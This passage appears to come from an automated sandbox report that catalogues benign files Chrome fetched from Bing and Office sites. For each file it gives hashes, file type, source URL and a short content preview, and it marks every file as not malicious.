                                                                                                    SHA-256:78AA31D0B825A124C7CA14F4FE049560D1BDD186E8CDD7785BE87C1D005384E4
                                                                                                    SHA-512:C92BB45C0C4367D2A92B75BBFAE381372A1CB9ED77EE66C4D8DF7537EB88768A7A835F637D3B7556EC43026B88C9B3A6DB4C5B57B9D68E8D446554B5FAAE0277
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:/*!DisableJavascriptProfiler*/.var BM=BM||{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector||!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:ei,M:r,T:0,K:r,F:0}};pi()}function oi(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]||i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function si(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r||ni;t=t||!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (684), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):684
                                                                                                    Entropy (8bit):5.166363591063823
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:2Q12lkSF3mVwl/BJWhuSpOYkM3+Pu1w2E1fNPrQ5uj5lD+QgAjTYCXPrQuN:2Q1QkSFr5BJupODpfPrQ8Dn/XPrQuN
                                                                                                    MD5:C1D04951E98B892931D4C2BC34555057
                                                                                                    SHA1:55E6297F3499B4961C8E956F7F088868CD59C769
                                                                                                    SHA-256:7C317940549467B3210D2F72DA000BAC3481ABFDE3AC5358D398EB64DCBC8532
                                                                                                    SHA-512:D427487C00AF5E8D9DB222F8A01521A5C8646AE8E459D517443DAC8EF2DBEC2DDEA91877B095B82CF3E52031E1650C7360811ED8A06E02F85E3517974D36AD96
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){var n,i=(new Date).getTime(),t=_G!==undefined&&_G.RTO!==undefined?_G.RTO:null,r=((n=_G===null||_G===void 0?void 0:_G.EF)===null||n===void 0?void 0:n.infrefcflog)===1;t!=null&&(window.history.scrollRestoration="auto",document.addEventListener("visibilitychange",function(){if(document.visibilityState==="visible"&&window.location.href.indexOf("/search")>=0&&(new Date).getTime()-i>t&&(Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Active"),!r)){var n=window.location.href+(window.location.href.indexOf("dayref=1")<0?"&dayref=1":"");window.location.href=n}}),typeof setTimeout!="undefined"&&setTimeout(function(){Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Inactive")},t))})()
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):34732
                                                                                                    Entropy (8bit):5.452487645923916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                                                    MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                                                    SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                                                    SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                                                    SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/kxeSzXDO1K1Yb2MpwwwpTr6hVI4.js
                                                                                                    Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):2469
                                                                                                    Entropy (8bit):7.885169647088345
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PFkJWrrxpQPqssvyPgq87zfSS7ASBsl3A6sTNIBYaBJ1:t/rTQPqnbL7TSz6sh0ZIua9
                                                                                                    MD5:2C6D1349963840B56A4C111E46A74113
                                                                                                    SHA1:5F7B0B32FB697907790D3A5A0297CFEA9C0D0071
                                                                                                    SHA-256:E0689208B82225C312E1F7E60BC33E0FAEE3A847A095168F3B033AA64A209357
                                                                                                    SHA-512:BFB54EAF966650C81894CCA9F4E34B9CCAEFCD13A29568A542F80659DC788AC9B8BD527C3B3F6B629799DA5B39C55B6DBFB67D61D93F01390655FAEECC4C0F52
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.e8415ff4-341c-4ef5-b4e9-08c7fb81b075&w=32&h=32&qlt=98&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....GIDATXG..ylT...*.c{<..x.6.." .0.e<....;6...cl.....{..........M....RbJB.JM.T...GTE..J....H...{3..P..IGOo4......g..]....._..w.........9.|.....w.....y_.....=..^O....?.s...........6..@.....>.....&....o<y....GO.;....b?.....7.?ov~..W.............G...kG.&4...#u.....uC.TrV.....g.;......QsI...........R..a.TyV...)oP...p...S.w}2.l@.)9..I..w..C.!E...I..u.u?.[./`p|.C.....1.....g...xl.....`l.G....j..S.M................JO..&.._..C......0.V.C@...V.F..<...w+..o....7.n.P...u..?...<&..{..0...c..`.SU..U...V....5U..w.i.,?E....#0..f2..Uq.~..._|.:...A..........._.%wo}4.........I.g.).+...(.Uu...`.<..J.>....O......o.;.+........g..R.|@....!..(..)...G.C...,......3~_..E....`.K.]q....%.....+9.l.d........+..)9...]........K.e.W...8.^"cY.3`.9."c.=..K..>L......uP....A..`.w..wh...q.}....v..(..PJ.A)>E...H..PS.Q....!...0.R.C.^6..Bf[..A.........0.....E......r......fs.......l...]D.Jm....ND7.F.d.iV*...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 1143 x 794, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):383270
                                                                                                    Entropy (8bit):7.988693191327277
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:TPRLLUNp5X4PgHMt6rH4wJKdPUQ8hR8YXR+JQKFTRvMqtpKyg9N/hTWjrA3S1SmI:hYNTIP/wJuMQ8hR8YXR+JQK3gz/JGA3t
                                                                                                    MD5:7B89E7B9A1E5F0E2AD529D5A85E1ACB7
                                                                                                    SHA1:304ECC4375129D905E70AFE830E998470DADECD9
                                                                                                    SHA-256:1329D493F7D313CA0026EB2664D1AACECBCA82D5BE70F692DD61C980F3BB16BE
                                                                                                    SHA-512:F35C28AC263F1C8A16385D6624D33D0EBCA72F0F959DA654C5B552D5B23EDF41A16D922A9FB6AAFD408AF7E2721D42C0145D99E6B8BC462679FADBEF2C484BA4
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-1-mreb-7b89e7b9a1.png
                                                                                                    Preview:.PNG........IHDR...w..........b......pHYs.........&.:4....sRGB.........gAMA......a....IDATx...{.o.U....~.q.>.z.....*W...1.1...$.N...L...%...*.)..{...J]....i!.-uh!ZJB......4j.....@$l.:..7.....5z.5.s......~.:...~.S..[k..Zk....5.D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (14140), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14140
                                                                                                    Entropy (8bit):5.176202386654817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:X7zKStQ3Z6NFIvSAqwXpqsp6ItMbHOOUq8oAXz5hzgOxqRgfitvD6TryoTL459zE:PK2IqASsp8bHOlvMBDg++Mtu
                                                                                                    MD5:8F34B56ECA56F9A32B8B953FF2F9005B
                                                                                                    SHA1:32BF772D1026867833E2DF658A2E4AABDBA9BF78
                                                                                                    SHA-256:E2D3D9EDEB47DA532DF101E2FE0935890F7E52ACB204340BD78BF1CF4B4C4441
                                                                                                    SHA-512:6952E2203F672A26FBD64E1A3ABDC3C1D59DA2A5DC27FEFBC59BDF95A84359FF2EF200CDF7A22FD187C031AF31DB349D36E240ECE770EFFD3B5D46718794C64D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:!function(n){"function"==typeof define&&define.amd?define(n):n()}(function(){function t(n,t){for(var i in t)n[i]=t[i];return n}function g(n){var t=n.parentNode;t&&t.removeChild(n)}function a(n,t,r){var o,s,f,e={};for(f in t)"key"==f?o=t[f]:"ref"==f?s=t[f]:e[f]=t[f];if(arguments.length>2&&(e.children=arguments.length>3?i.call(arguments,2):r),"function"==typeof n&&null!=n.defaultProps)for(f in n.defaultProps)void 0===e[f]&&(e[f]=n.defaultProps[f]);return u(n,e,o,s,null)}function u(t,i,r,u,f){var e={type:t,props:i,key:r,ref:u,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,__h:null,constructor:void 0,__v:null==f?++p:f};return null==f&&null!=n.vnode&&n.vnode(e),e}function f(n){return n.children}function e(n,t){this.props=n;this.context=t}function o(n,t){if(null==t)return n.__?o(n.__,n.__.__k.indexOf(n)+1):null;for(var i;t<n.__k.length;t++)if(null!=(i=n.__k[t])&&null!=i.__e)return i.__e;return"function"==typeof n.type?o(n):null}function nt(n){var t,i;if(null!=(n=n.__)&&null!=n.__c){for(
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1048), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1048
                                                                                                    Entropy (8bit):5.307685089767312
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:/sfRW6p2ZQtBH6X3xuvM0Ry9kfr9VH4HPsRWVVcysewnRk15PdFFSZC8:/ww82ZtHxuvHfr9l4H0wsys/RkTPLk08
                                                                                                    MD5:56E8BADE1AFF1AE713AC7F9750A01C3B
                                                                                                    SHA1:11563339BE06540F41CB26F460E459E5CCDF6F54
                                                                                                    SHA-256:14F8C440DABB87A33C67D911241559B21047F052183261F6B942B0136F4F94AA
                                                                                                    SHA-512:D655BA27F3B02344837A56699947574C2F397C54F1BF10E75569A93F174EA16BAFB4D8A0C04BF3866F1E3F9D5A3FCCD6CC7173E134FDC6728793CE0F33ADE358
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/EVYzOb4GVA9Byyb0YORZ5czfb1Q.js
                                                                                                    Preview:var captionImageOverlay;(function(){function f(){var f,t=(f=_d.getElementsByClassName("b_greyBackgroundModal"))===null||f===void 0?void 0:f[0],n=_d.querySelectorAll(".b_ci_image_ova"),e=Array.prototype.slice.call(_d.querySelectorAll(".b_imgcap_coll .b_ci_image_ova")),r,u;if(t!=null&&n!=null){for(r=0;r<(n===null||n===void 0?void 0:n.length);r++)u=n[r],e.includes(u)?i(u,t,!0):i(u,t);t.addEventListener("click",function(){return!1})}}function i(i,f,e){e===void 0&&(e=!1);i.addEventListener("click",function(o){sj_pd(o);var s=i.getAttribute("aria-label");if(!s)return!1;f.style.display="block";sj_evt.bind(n,r);sj_evt.fire(u,s);_w.sj_log&&sj_log(t,"OverlayImageClick",e?"RCLIDPShowed":"RCIDPShowed")})}function r(){var i,u=(i=_d.getElementsByClassName("b_greyBackgroundModal"))===null||i===void 0?void 0:i[0];if(u==null)return!1;u.style.display="none";_w.sj_log&&sj_log(t,"ImageDetailPageClose","RCIDPClosed");sj_evt.unbind(n,r)}var u="IFrame.Navigate",n="IFrame.Close",t="CI.CaptionImageOverlay";f()}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.33c6a76b-616a-4fc5-ac11-7a644a97dc30&w=32&h=32&qlt=95&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2469
                                                                                                    Entropy (8bit):7.885169647088345
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PFkJWrrxpQPqssvyPgq87zfSS7ASBsl3A6sTNIBYaBJ1:t/rTQPqnbL7TSz6sh0ZIua9
                                                                                                    MD5:2C6D1349963840B56A4C111E46A74113
                                                                                                    SHA1:5F7B0B32FB697907790D3A5A0297CFEA9C0D0071
                                                                                                    SHA-256:E0689208B82225C312E1F7E60BC33E0FAEE3A847A095168F3B033AA64A209357
                                                                                                    SHA-512:BFB54EAF966650C81894CCA9F4E34B9CCAEFCD13A29568A542F80659DC788AC9B8BD527C3B3F6B629799DA5B39C55B6DBFB67D61D93F01390655FAEECC4C0F52
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....GIDATXG..ylT...*.c{<..x.6.." .0.e<....;6...cl.....{..........M....RbJB.JM.T...GTE..J....H...{3..P..IGOo4......g..]....._..w.........9.|.....w.....y_.....=..^O....?.s...........6..@.....>.....&....o<y....GO.;....b?.....7.?ov~..W.............G...kG.&4...#u.....uC.TrV.....g.;......QsI...........R..a.TyV...)oP...p...S.w}2.l@.)9..I..w..C.!E...I..u.u?.[./`p|.C.....1.....g...xl.....`l.G....j..S.M................JO..&.._..C......0.V.C@...V.F..<...w+..o....7.n.P...u..?...<&..{..0...c..`.SU..U...V....5U..w.i.,?E....#0..f2..Uq.~..._|.:...A..........._.%wo}4.........I.g.).+...(.Uu...`.<..J.>....O......o.;.+........g..R.|@....!..(..)...G.C...,......3~_..E....`.K.]q....%.....+9.l.d........+..)9...]........K.e.W...8.^"cY.3`.9."c.=..K..>L......uP....A..`.w..wh...q.}....v..(..PJ.A)>E...H..PS.Q....!...0.R.C.^6..Bf[..A.........0.....E......r......fs.......l...]D.Jm....ND7.F.d.iV*...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):282
                                                                                                    Entropy (8bit):4.768675821769942
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:tbXH4mc4sl3UY7eERI1+N9H5R0MLERIwoVNdJMvdIXyCWfuBIAFfu:tbH41niB1+bj0MLBnpavdqyVGBIAFm
                                                                                                    MD5:E38795B634154EC1FF41C6BCDA54EE52
                                                                                                    SHA1:16C6BF388D00A650A75685C671AF002CEA344B4B
                                                                                                    SHA-256:66B589F920473F0FD69C45C8E3C93A95BB456B219CBA3D52873F2A3A1880F3F0
                                                                                                    SHA-512:DCA2E67C46CFF1B9BE39CE8B0D83C34173E6B77EC08FA4EB4BA18A4555144523C570D785549FED7A9909C2E2C3B48D705B6E332832CA4D5DE424B5F7C3CD59BE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16">.. <path d="M0 0h16v16h-16z" fill="none"/>.. <path d="M8 1a7 7 0 1 0 7 7 7 7 0 0 0-7-7zm1 10a1 1 0 0 1-2 0v-3a1 1 0 0 1 2 0zm-.293-5.293a1 1 0 1 1 .293-.707 1 1 0 0 1-.293.707z" fill="#767676"/>..</svg>
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 197x113, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4065
                                                                                                    Entropy (8bit):7.855097209839883
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:CRCIrrL8j18B7jmUsH2gU7PN1HNOsk9Z0wXWj6H:FIrvjmtHWwXWjK
                                                                                                    MD5:F381F8D3AD2C73D1D8ED2BD3F7B53AC9
                                                                                                    SHA1:15499845A9A3E7565D0EDE01185D03CB9748335D
                                                                                                    SHA-256:A1CABEDD227586B2F7F4F2C0E73193205629402F3EBED1156007E2BFFA46F4A8
                                                                                                    SHA-512:89A0C85C8768B8EAD0CA09AA5BBFB38BB978136718F5E35AA6C3704F05097B7199F52FD9F80417B0997871070B7919D6F26548D526F70A71DD2704A998556223
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............q...."......................................................{.......|...}...Yl8[[..Q..=..s...e...A.ZUj9..L.......8.~..\[W-..O..fl.9.OD.a '..2H....{&.f..3.eAYdv....;u.r..!o..vG~@....a........F.......lj...v^....x.7.....&..z~.1sv:^...q.hO...@..W.X....t.z.,^...L|..i..Z.Z,1..4....;.P[..bK.7=j.....<.....~.r......D..S..b...>.._x.&u...-M..4.}>.VE..m.D..........................................9...K./h.%...08z..9..KI....k..-..I`....u......Z!.W........d..e..NB...h".!..`. M..H&...(..g...(..........................2..!1.3."#AB...........c#.....E....>..uJ)...Ov&~`G.....V...l.......t\.(..h,*.Y..2Bc8.23.SI.......Z...y........Lr.0Y~...V.6..U......^..-.Z.'8....8.r...8U._.H.0k....\N*.p+2..P..L.a...E...zrR=...J..~....8...2.+.m.....Aj_dP.f....q,Ar....F$ HX.#0P..f$\`..5.....).}e...?.^.....Ep.../0..7.j....jJ.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (589), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):589
                                                                                                    Entropy (8bit):5.085028072286348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:bCMUnSeFbDN5a8f8R4Xtmp4ElMYVoJFp1wErUVKtRJnZM4C8Lv:bPUSeFbZ5ae8R4XtmqElFVK1ptRNj
                                                                                                    MD5:7A903A859615D137E561051C006435C2
                                                                                                    SHA1:7C2CBEB8B0E83E80954B14360B4C6E425550BC54
                                                                                                    SHA-256:281D6234FD292800C2A5DBD14E524C9CEE0D4438188B0B7D873ABF41515A7666
                                                                                                    SHA-512:AA47EFAB7EC689B838D1E5ADFE26E035E8B93F2B806F1954214447CB2065FA5906F81A70B4C656B3CE1490D8AC2009C7E7B0F96491D6D4559C41FB25D08FE35C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/fCy-uLDoPoCVSxQ2C0xuQlVQvFQ.css
                                                                                                    Preview:#rewardsLoadingAnimation{position:absolute;top:50%;left:50%;margin-left:-30px;z-index:1;border-radius:50%;border:1.5px solid;border-color:#0078d4 #c7e0f4 #c7e0f4;animation:spin360Deg 1.3s cubic-bezier(.53,.21,.29,.67) infinite}#rewardsLoadingAnimation.extraLarge{width:100px;height:100px}#rewardsLoadingAnimation.large{width:80px;height:80px}#rewardsLoadingAnimation.medium{width:60px;height:60px}#rewardsLoadingAnimation.small{width:40px;height:40px}#rewardsLoadingAnimation.extraSmall{width:20px;height:20px}@keyframes spin360Deg{from{transform:rotate(0deg)}to{transform:rotate(360deg)}}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (15088), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):15088
                                                                                                    Entropy (8bit):5.189911346037812
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:WHTUQdwUKASrMxdhuCMnirx/hN3AjXcn1bkoDLw2USsUeye:WHwqI4/QjozKi5e
                                                                                                    MD5:6100D2A3324E8EFD4DA73EC7101F3000
                                                                                                    SHA1:CB9987C5BBA13D8FE33F0B420155AEE4E8CED2D1
                                                                                                    SHA-256:75EB6620C2B15BBBDFDA091DBAEF7B9DB040DB70DE388C30EC9DF68BBC33DDAC
                                                                                                    SHA-512:4DB99F39035ADBF3688FF934600817FD52DCD048B7A7FB2A5050D4376861F966EE11CA13F1744ADEEE3F3B1D620683853B64B36F6A88F28D65EAEBE4B7346FDC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/y5mHxbuhPY_jPwtCAVWu5OjO0tE.js
                                                                                                    Preview:var SlideExperienceLite;(function(n){function h(n,t,i,r,u,f,e,o,h,c,l,a,v,y,p,w,b){var k=new s(n,t,i,r,f,e,o,h,c,l,a,v,y,p,w,b);k.init()}function t(){sj_evt.fire("lazyLdImg")}var i=_G.RTL,u=i?"marginRight":"marginLeft",e=i?"paddingRight":"paddingLeft",f="narrpole",o=1004,s=function(){function n(n,t,r,u,f,e,o,s,h,c,l,a,v,y,p,w){var k,b;if(this.swipeThreshold=50,this.firstSlideOffsetLeft=4,this.activeSlideIndex=0,this.enableCopyText=!1,this.scrolling=!1,this.id=n,this.controlId=t,this.bar=_ge(t),this.bar){if(this.control=_ge(this.bar.id+"c"),this.viewport=this.getViewPortParent(this.bar)||this.bar.parentElement,!this.viewport)return;if(this.dirMultiplier=!i||sb_ie?1:-1,this.showChevronAllTime=f,this.hideChevronsOnStart=s,this.paddingBuffer=h&&r?this.computePaddingBuffer():0,this.appns=this.control.getAttribute("data-appns"),this.kvalue=this.control.getAttribute("data-k"),this.slideExpType=r?"Carousel":"SlideShow",this.slideRightMargin=u,this.totalSlides=this.bar.childElementCount,this.to
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1833), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1833
                                                                                                    Entropy (8bit):5.03858600819449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Jk08PkQix8QboQO7cxfFb87c9nH40VtN3HCBuNDbHNxpA:sPb6oZY80tVbHDtTA
                                                                                                    MD5:D7365C424E30CB142A85B84C0618D671
                                                                                                    SHA1:7212FE88CD0686A381ACB1B0583A544AE3ADA1B0
                                                                                                    SHA-256:8FD0225B5F75EE2326ADC68A10F5B9FC50C30A45BF4B61C7EE9364103E6102C8
                                                                                                    SHA-512:26D9A5DA2CC591954C6014B4DE1826653C9F058E9C8287342D8F0F2C9960BDAF30E1D4F8ADDF529830327D94C8BCA21848A3ADAF2846036A5E9C618992B18D5F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var ExtendIconClickTargetV2;(function(){function n(){var u=document.querySelectorAll(".b_tpcn"),e,r,f,n,i,t;if(u)for(e=function(n){var r=u[n],i,t,f;if(r&&(r.onclick=function(n){if(!n||n.target===r){var t=r.querySelector(".tilk");t&&(_w.si_T&&_w.si_T(t.getAttribute("h")),t.click())}},i=r.nextElementSibling,i&&(r.addEventListener("mouseover",function(){r.style.cursor="pointer";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="underline")}),r.addEventListener("mouseout",function(){r.style.cursor="";var n;n=i.tagName==="H2"||i.tagName==="H3"?i.querySelector("a"):i.querySelector("h2 a, h3 a");n&&(n.style.textDecoration="")}),t=i,!t||t.classList&&t.classList.contains("b_title")||t.tagName==="H2"||t.tagName==="H3"||(t=t.querySelector("h2, h3")),t))){if(f=t.querySelector("a"),!f)return{value:void 0};t.addEventListener("mouseover",function(n){n&&n.target===t&&(t.style.cursor="pointer",f.style.textDecoration="underline")});t
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 11356, version 1.0
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):11356
                                                                                                    Entropy (8bit):7.9788069780762
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:bkChSYgOv8Dxgh8lDxlYOT9hNP84LmuuDm3TyRKySHvJWcUihSCtv46A4oNr8oYe:hM8kzlVlz5X08muW2TykySHBAeU4SnYe
                                                                                                    MD5:DAC73DC7B1EB35CD360DA41648DE072B
                                                                                                    SHA1:DA1F6A5F46B72320A55B398F5F66D5E9AA6132F1
                                                                                                    SHA-256:2CD3EF7B5B677B7827BFBE5B926A283E7CA687DDB6B021FA4289630671EBD061
                                                                                                    SHA-512:366155FF687C7892AABD45C875F6D9D695AFDC247B807B18094C18ABD4BF6E415E9C78CE2EDE4076C378E659C51B1050C10323572E728B6E179F8ED1CD4A6057
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                                                                                                    Preview:wOF2......,\......W...+.........................?FFTM..&..... .`..z......d.J.....6.$.... ..y..r..K5l[....@...*...f..{0......t..T.@u...@Le..Yt..+.Z...E<.v{.k/.....p..1..e.z-:.....&.O.=...m..X.....{.7.?2...P%.7.k.s.....$..y]V.>Hj.d..!f....g..C....k....6TL"..$r.6.Qc...j....tt[(.....P....7....2j.1.\.nN.u."6....4.}Yl.Ql+7l..O}.:..SqZ.r...`._@...y.m.!.n@.....z.]i. .?..s{.g.Q...'. ?l.$A..o.,j.m..-.+..H.4}{...7....3...u....|..i*..'#.y[.M.......f...]A.JS~..:6.......T...'.....yU..,]|.....,g.T......P..d^..WEy<.%..*...5JT....H...tZ..E..xA.]r.]..z.qU..X.....P.*Yp..d..E.G...TX.......#(...........0..h]..Ns.....|.<....9..m.P....J....X$F.7P....?..s..XY..|{+n{\...s...e\.."....q.y.F8.......x...:.W..... ~.o. .<NT..:.........}.?._:.@q.6..=..@.#:.a:..Rb....V./]U..6.Mz..Iw.3.Y.,{60........R..........k>0..d..a`<1n8........g....k..........{...........U.i...>.mOK..e.6s)...JSF..........o'..|...0G_N...........D....yh;.S..xf...J...q..u.n.Z..<..>.......|...~..*..1...
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (674), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):674
                                                                                                    Entropy (8bit):5.239693493116514
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                                                    MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                                                    SHA1:F486B2745E4637D881422D38C7780C041618168A
